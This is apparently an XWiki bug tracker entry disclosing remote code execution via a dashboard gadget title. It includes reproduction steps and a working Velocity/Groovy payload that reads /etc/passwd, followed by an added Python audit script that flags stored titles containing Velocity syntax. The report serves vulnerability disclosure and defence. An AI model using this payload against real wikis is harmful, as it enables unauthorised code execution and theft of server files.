XWiki Platform / XWIKI-17794

RCE via Gadget title


    Description

      Registered users can execute server-side code via the gadget title.

      Full path to reproduce:

      1) Create a new user on http://playground.xwiki.org/ (or run XWiki locally using the latest Docker image)
      2) Go to profile -> Edit -> My dashboard -> Add gadget
      3) Choose any gadget (e.g. content or python).
      4) Paste the following payload into the title field:

      $request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("javax.script.ScriptEngineManager").getEngineByName("groovy").eval("new File('/etc/passwd').text")

      5) Submit the gadget

      Expected behaviour: the user is unable to execute server-side code.

      Actual behaviour: the user can execute server-side code.
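      The root cause described above is that a user-supplied gadget title is evaluated as Velocity. The following audit script is an added example (not part of this issue or of XWiki) that an administrator could run over exported gadget titles to find ones that contain Velocity references or directives; it assumes titles have been exported as (owner document, title) pairs, and the sample data is constructed.

```python
"""Audit stored dashboard gadget titles for Velocity syntax (added example, not XWiki code)."""
import re

# A Velocity reference: $ref, $!ref or ${ref}; the identifier must start with a letter,
# optionally followed by property or method accesses such as .foo or .bar(...)
_REFERENCE = re.compile(r"\$!?\{?[A-Za-z][\w-]*(?:\.[\w-]+(?:\([^)]*\))?)*\}?")
# A Velocity directive such as #set( or #evaluate( (brace form #{set} included)
_DIRECTIVE = re.compile(
    r"#\{?(set|if|elseif|else|end|foreach|macro|evaluate|include|parse|define)\b\}?"
)
_METHOD_CALL = re.compile(r"\.\w+\s*\(")


def classify_title(title: str) -> list:
    """Return the reasons a title looks like Velocity code (empty list if it looks plain)."""
    reasons = []
    refs = _REFERENCE.findall(title)
    if refs:
        reasons.append("velocity-reference")
        # A method call on a reference is what turns a template into script execution
        if any(_METHOD_CALL.search(r) for r in refs):
            reasons.append("method-call")
    if _DIRECTIVE.search(title):
        reasons.append("velocity-directive")
    return reasons


def find_suspicious_titles(gadgets):
    """gadgets: iterable of (owner_document, title). Returns [(document, title, reasons)]."""
    hits = []
    for doc, title in gadgets:
        reasons = classify_title(title)
        if reasons:
            hits.append((doc, title, reasons))
    return hits


# Constructed sample data; owner document names are hypothetical
SAMPLE_GADGETS = [
    ("XWiki.alice", "My activity"),
    ("XWiki.bob", "Budget: $5 left, item #1"),  # plain text: $5 and #1 are not Velocity
    ("XWiki.carol", "$services.localization.render('welcome')"),
    ("XWiki.dave", "#set($x = 1) hello"),
    ("XWiki.eve", '$request.getServletContext().getAttribute("x")'),
]

if __name__ == "__main__":
    for doc, title, reasons in find_suspicious_titles(SAMPLE_GADGETS):
        print(f"{doc}: {title!r} -> {', '.join(reasons)}")
```

      Titles flagged with "method-call" are the ones to review first, since a plain reference only reads a value while a method call invokes code.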

      Attachments

        1. local_11_10_10.png (751 kB, Grigorii Liullin)
        2. local_12_7_1.png (1015 kB, Grigorii Liullin)
        3. rce_gadget_title_playground_xwiki_org.png (1.26 MB, Grigorii Liullin)
        4. script_right_title_execution.png (833 kB, Grigorii Liullin)
        5. script_right.png (202 kB, Grigorii Liullin)
        6. user_with_script_and_program.png (567 kB, Grigorii Liullin)
        7. user_with_script_without_program.png (509 kB, Grigorii Liullin)
        8. xwiki_rce_gadget_title_as_admin.png (1.08 MB, Grigorii Liullin)
        9. xwiki_rce_gadget_title_as_user.png (1.22 MB, Grigorii Liullin)

      People

        Simon Urli (surli)
        Grigorii Liullin (jay_from_future)